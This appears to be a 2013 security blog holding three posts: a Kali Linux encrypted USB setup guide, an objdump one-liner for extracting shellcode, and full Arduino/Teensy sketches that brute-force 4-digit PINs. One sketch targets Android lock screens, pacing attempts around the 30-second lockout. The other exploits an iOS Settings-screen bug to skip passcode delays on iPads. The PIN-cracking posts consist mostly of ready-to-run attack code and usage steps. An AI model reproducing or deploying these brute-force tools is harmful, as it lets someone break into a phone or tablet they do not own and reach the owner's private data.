Tuesday, June 11, 2013

Kali Linux 1.0.3 Persistent Encrypted USB Drive

Preface


Back in the Backtrack days, I really liked to create an encrypted, persistent, USB thumb drive of my favorite penetration testing distribution. It comes really handy during an engagement, where you can boot from a USB drive, but since you will still work in your client's environment you want to store your findings securely, on an encrypted drive.

With Backtrack, I was basically always following the most recent howto of Kevin Riggins [1].

Now that Kali is out and it has the encrypted drive installation option, I was like:



...because after you boot up your installed USB drive... nothing happens.... it just won't boot! :P

Fixing this is not difficult, but it's quite annoying, so I decided to write this howto for those who would like to find the whole solution in one place, until a fixed ISO is released by the Offensive Security guys.

Installation Steps


The installation steps are basically the same as described in the official documentation [2], so just follow these steps.

You can use a virtual machine (using VirtualBox for example), load the Kali ISO into the virtual CD/DVD, and adding a USB filter on your USB drive (you can find the details explained by Jeremy Druin in [3]). Personally, I used a Live CD, plugged in a USB drive and did the installation on a laptop.

Just a few important remarks:
  1. Erasing a 32 GB thumb drive takes a few hours, but even a 8 GB drive would require some time. Either get prepared for it (I chose to wait and erase it while I was asleep), or skip it.
  2. When you are asked to install GRUB to MBR or first hard disk, choose "No" (or "Cancel", I don't remember the name of the button, but just say decline it). After this, you will be asked to define where to install GRUB. Choose you USB drive. For me, it was /dev/sdb.

Once you are finally done with the installation, boot from the USB drive. I ended up with the following screen (sorry for the poor quality, I made it with my phone):


No worries, we will fix this quickly, based on what I found on the Kali forums [4].

In order to boot Kali from the USB drive, first we have to mount the crypted drive (mine is still sdb5):

(intramfs) cryptsetup luksOpen /dev/sdb5 sdb5_crypt

Here, you have to enter the passphrase you gave during the installation. Then,

(intramfs) lvm vgchange -ay
(intramfs) exit

Once you hit Enter on the exit command, Kali should boot up. :)

However, we are not done yet, since if you reboot, you would have to enter the above again. To make these changes persistent, we need to edit the /etc/crypttab file.

First, you need to get the UUID of your encrypted partition. Run the following command (again, my crypted drive is /dev/sdb5, your's can be different!):

root@kaliusb:~# blkid /dev/sdb5
/dev/sda5: UUID="2cfee723-b12a-49e1-8c1d-a481112c12d0" TYPE="swap"

The above UUID is obviously bogus, it only shows the format. Copy your UUID that you got as output, and open up the /etc/crypttab file. Add one line, so it will look something like this:

# <target name=""> <source device=""> </source> <key file=""> <options>
sdb5_crypt UUID=2cfee723-b12a-49e1-8c1d-a481112c12d0 none luks

OK, we are almost there... save the file and run:

root@kaliusb:~# update-initramfs -u

If you have done everything right, you shouldn't get any error messages and once you reboot, the encrypted drive will be automatically mounted and Kali will boot up from you USB thumb drive.

Happy hacking! :)


References


[1] http://www.infosecramblings.com/backtrack/

[2] http://docs.kali.org/installation/kali-linux-encrypted-disk-install

[3] http://www.irongeek.com/i.php?page=videos/kali-linux-live-boot-usb-flash-drive-jeremy-druin-webpwnized

[4] http://forums.kali.org/showthread.php?5753-Encrypted-LVM-install-fails-to-boot

Tuesday, June 4, 2013

One-liner to only get the shellcode from objdump

I just love www.commandlinefu.com :) Found a real treasure on it today.

This post is just a quick note for me how to get only the shellcode from objdump using a one-liner.

Solution 1

This one is OK, but note that at the second cut, we are getting only 6 columns, so you might need to modify that to fit your needs:

objdump -d ./PROGRAM | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'

Solution 2

This one is actually better, since it does not rely on field widths:

for i in `objdump -d ./PROGRAM | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' `; do echo -n "\x$i" ; done | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'

Happy hacking! :)

Monday, June 3, 2013

Online Brute-forcing Android and iOS PIN Lock with Teensy

Preface

So recently I was playing with iOS and Android devices, and saw a video on Hak5 by Darren Kitchen about  Brute-forcing Android PIN Lock with Rubber Ducky (see [1] and [2]). Now, I don't have a Rubber Ducky, only Teensy 2.0 and 3.0 boards and I prefer them anyway, since they are giving me more flexibility (plus, the Teensy 3.0 is pretty powerful too). Also, they are a lot more cheaper :).

I looked for an Arduino code for Teensy, but I only found a similar project for DigiStump's DigiSpark Model A [3], so I decided to write a small, quick and dirty program for Teensy.

Android PIN lock


I bought a USB-OTG cable and stared playing with it. Luckily (or unluckily?), on Android, the only penalty for wrong PINs is 30 seconds after 5 tries. A quick calculation, and you can see that a 4 digit PIN takes a little less than 17 hours to brute-force.

The good news at least is that you are not limited to 4 digits. Android supports PIN lock up to 17 digits (however, I don't know who the hell can remember a 17 digit PIN number...)

Hardware needed

  • Teensy 3.0 or Teensy 2.0 or even Teensy++ 2.0
  • Apple iPad Camera Connection Kit (USB On-The-Go. The USB OTG systems can drop the hosting role and act as normal USB devices when attached to another host - you can get it in every electronic store)
  • USB A type plug (male) to USB MINI-B type (male) cable in case of Teensy++ 2.0 or Teensy 2.0 or USB A type plug (male) to USB MINI-A type (male) cable in case of Teensy 3.0
  • A USB-OTG Android phone :)
The first two hardware parts can be seen on the picture below:


Code

The code was written in the Arduino IDE. I know that the PIN brute-force part can be written using only the loop() without the for loops, like in [3], but I think it is easier to understand the code like this, and I don't think it has any real difference in terms of performance for this case.

Since brute-forcing even a 4 digit PIN takes a little less than 17 hours, you probably will not be able to do it in one run because the battery will die before that, so I decided to define the digitX_start and digitX_stop global variables to  make the setting of the start and end values for the PINs to try more comfortable. This way you can divide the 10000 total combination into five 2000 PIN chunks for example, and between them, you could charge the battery of the target phone.

During the PIN brute-forcing part, the On-Board LED is turned on while we wait 30 seconds between 5 tries in order to indicate that the Teensy it is currently waiting (I shamelessly stole this idea from the code found on [3]).

After all the PINs were tried once, I keep on hitting enter every 2,5 seconds to avoid the automatic screen lock, and start blinking the On-Board LED to signal that the PIN brute-forcing part has finished.

/*==========================================================================================
Purpose:  4-Digit PIN Brute Force attack for USB-OTG Android devices using Teensy 3.0
Author:   David Szili
Version:  1.0
==========================================================================================*/

// Flag to indicate if the PIN crack is finished or not
int finishedPINcracking = 0;

// Teensy 3.0 has LED on 13
const int ledPin = 13;

// Where to begin the PIN loops
const int digit1_start = 0;
const int digit2_start = 0;
const int digit3_start = 0;
const int digit4_start = 0;

// Where to stop the PIN loops  
const int digit1_stop = 9;
const int digit2_stop = 9;
const int digit3_stop = 9;
const int digit4_stop = 9;

void setup()
{
  // Initialize the digital pin as an output.
  pinMode(ledPin, OUTPUT);
  
  // Wait 5 seconds to prepare the Android Device
  delay(5000);
}

void loop()
{
  // Make the PIN cracking loops first
  if ( finishedPINcracking == 0 )
  {
    // Start going throuhg all the PIN conbinations
    for( int digit1 = digit1_start; digit1 <= digit1_stop; digit1++ )
    {
      for( int digit2 = digit2_start; digit2 <= digit2_stop; digit2++ )
      {
        for( int digit3 = digit3_start; digit3 <= digit3_stop; digit3++ )
        {
          for( int digit4 = digit4_start; digit4 <= digit4_stop; digit4++ )
          {
            if ( (digit4 == 4) || (digit4 == 9) ) // Wait for 30 seconds after 5 attempts
            {
              // Enter PIN: convert int to String and concatenate them
              Keyboard.println(String(digit1) + String(digit2) + String(digit3) + String(digit4));
              for ( int timer = 1; timer <= 6; timer++ ) // 6 * 5 seconds = 30 sec
              {
                // Turn on the On-Board LED to indicate it is waiting
                digitalWrite(ledPin, HIGH);
                // Wait 5 seconds and hit Enter
                delay(5000);
                Keyboard.println();
              }
              // Wait 2 more extra seconds, just to be sure
              delay(2000);
              // Turn off the On-Board LED
              digitalWrite(ledPin, LOW); 
            }
            else // Normal brute-force mode
            {
              // Enter PIN: convert int to String and concatenate them
              Keyboard.print(String(digit1) + String(digit2) + String(digit3) + String(digit4)); 
              delay(500);
              Keyboard.println();
            }
          }
        }
      }
    }
    // Flip the flag to true
    finishedPINcracking = 1;
  }
  // After the PIN cracking loops, hit Enter to avoid automatic screen lock in case of a successful attack
  else
  {
    // Wait 5 seconds and hit Enter and blink the On-Board LED to indicate it is finished
    digitalWrite(ledPin, HIGH);   // Set the LED on
    delay(2500);                  // Wait for 2,5 seconds
    digitalWrite(ledPin, LOW);    // Set the LED off
    delay(2500);                  // Wait for 2,5 seconds
    Keyboard.println();
  }
}

Usage

Well, it's plain simple:

  1. Attach the USB-OTG cable to the Phone.
  2. Attach a USB A to USB MINI-A cable (Teensy 3.0) or USB A to USB MINI-B cable (Teensy++ 2.0 or Teensy 2.0) to the USB-OTG cable.
  3. Attach Teensy to the cable.
  4. Bring in the screen lock screen on the Android Phone. You will have 5 seconds by default to do this, but you can change it in the setup().
  5. Have a coffee/tea/lunch/sleep/whatever while you wait for the results :)

iOS Passcode Lock


I also bought an Apple iPad Camera Connection Kit, that allows you to use a USB keyboard with your iPad and I wanted to use my Teensy to perform an online Brute-forcing against the Simple Passcode Lock, which is the default if you set the Passcode Lock.

Passcode validation is performed at two levels in iOS: one at springboard and another one at kernel level. Brute-force attack performed at springboard level locks the device, introduces delays and may lead to data wipe-out.

The delay levels are (on iOS 6.1.2):
  • After the first 6 tries: 1 minute.
  • After the 7th try: 5 minutes.
  • After the 8th try: 15 minutes.
  • After the 9th try: 60 (!!!) minutes, and 60 minutes for each attempt after that,
  • And after too many attempts, your device may display, "[Device] is disabled, connect to iTunes", or just wipe all data :P
Since a Teensy would simulate a person tapping in a Passcode (meaning that we are on springboard level), I don't think this is a feasible attack.

UPDATE (07/06/2013):


I saw a Hackaday [4] post about iOS PIN brute-forcing. Turns out that even though the attack won't work on the "normal" lock screen, if you use a physical keyboard on the Settings menu while you try to change the Passcode settings, you could ignore the delays because of a bug. :)

The whole thing is well explained on Pierre Dandumont's blog [5], except he didn't published any PoC code. I decided to test it out and publish it, since it only works on the Settings screen and it might be patched by Apple later. It takes about 1,5 hour to check every possible combination (I keep a 0,5 sec pause between each try).

Hardware needed

  • Teensy 3.0 or Teensy 2.0 or even Teensy++ 2.0
  • Apple iPad Camera Connection Kit (it's around 30 Euros)
  • USB A type plug (male) to USB MINI-B type (male) cable in case of Teensy++ 2.0 or Teensy 2.0 or USB A type plug (male) to USB MINI-A type (male) cable in case of Teensy 3.0
  • An iPad or an iDevice compatible with the Apple iPad Camera Connection Kit (Unfortunately, this does not include iPhones...)

The Code

Since there are no real restrictions and it should be really quick, there's not a lot a things to explain here. It's basically the same Arduino IDE code as before, but even more simple. I think, the differences should be obvious to everyone after the code for the Android:


/*==========================================================================================
Purpose:  4-Digit PIN Brute Force attack for iDevices compatible with 
          the Apple iPad Camera Connection Kit devices using Teensy 3.0
Author:   David Szili
Version:  1.0
==========================================================================================*/

// Flag to indicate if the PIN crack is finished or not
int finishedPINcracking = 0;

// Teensy 3.0 has LED on 13
const int ledPin = 13;

// Where to begin the PIN loops
const int digit1_start = 0;
const int digit2_start = 0;
const int digit3_start = 0;
const int digit4_start = 0;

// Where to stop the PIN loops  
const int digit1_stop = 9;
const int digit2_stop = 9;
const int digit3_stop = 9;
const int digit4_stop = 9;

void setup()
{
  // Initialize the digital pin as an output.
  pinMode(ledPin, OUTPUT);
  
  // Wait 5 seconds to prepare the Android Device
  delay(5000);
}

void loop()
{
  // Make the PIN cracking loops first
  if ( finishedPINcracking == 0 )
  {
    // Start going throuhg all the PIN conbinations
    for( int digit1 = digit1_start; digit1 <= digit1_stop; digit1++ )
    {
      for( int digit2 = digit2_start; digit2 <= digit2_stop; digit2++ )
      {
        for( int digit3 = digit3_start; digit3 <= digit3_stop; digit3++ )
        {
          for( int digit4 = digit4_start; digit4 <= digit4_stop; digit4++ )
          {
              // Enter PIN: convert int to String and concatenate them
              Keyboard.println(String(digit1) + String(digit2) + String(digit3) + String(digit4));
              delay(500);
          }
        }
      }
    }
    // Flip the flag to true
    finishedPINcracking = 1;
  }
  // After the PIN cracking loops, hit Enter to avoid automatic screen lock in case of a successful attack
  else
  {
    // Wait 5 seconds and hit Enter and blink the On-Board LED to indicate it is finished
    digitalWrite(ledPin, HIGH);   // Set the LED on
    delay(2500);                  // Wait for 2,5 seconds
    digitalWrite(ledPin, LOW);    // Set the LED off
    delay(2500);                  // Wait for 2,5 seconds
    Keyboard.println();
  }
}

Usage

Like I said, it only works on the Settings screen:

  1. Attach the Apple iPad Camera Connection Kit to the iPad.
  2. Attach a USB A to USB MINI-A cable (Teensy 3.0) or USB A to USB MINI-B cable (Teensy++ 2.0 or Teensy 2.0) to the USB-OTG cable.
  3. Attach Teensy to the cable.
  4. Bring in the Settings screen on the iPad, and choose the "Passcode Lock" menupoint. You will have 5 seconds by default to do this, but you can change it in the setup().
  5. Wait for the result.

References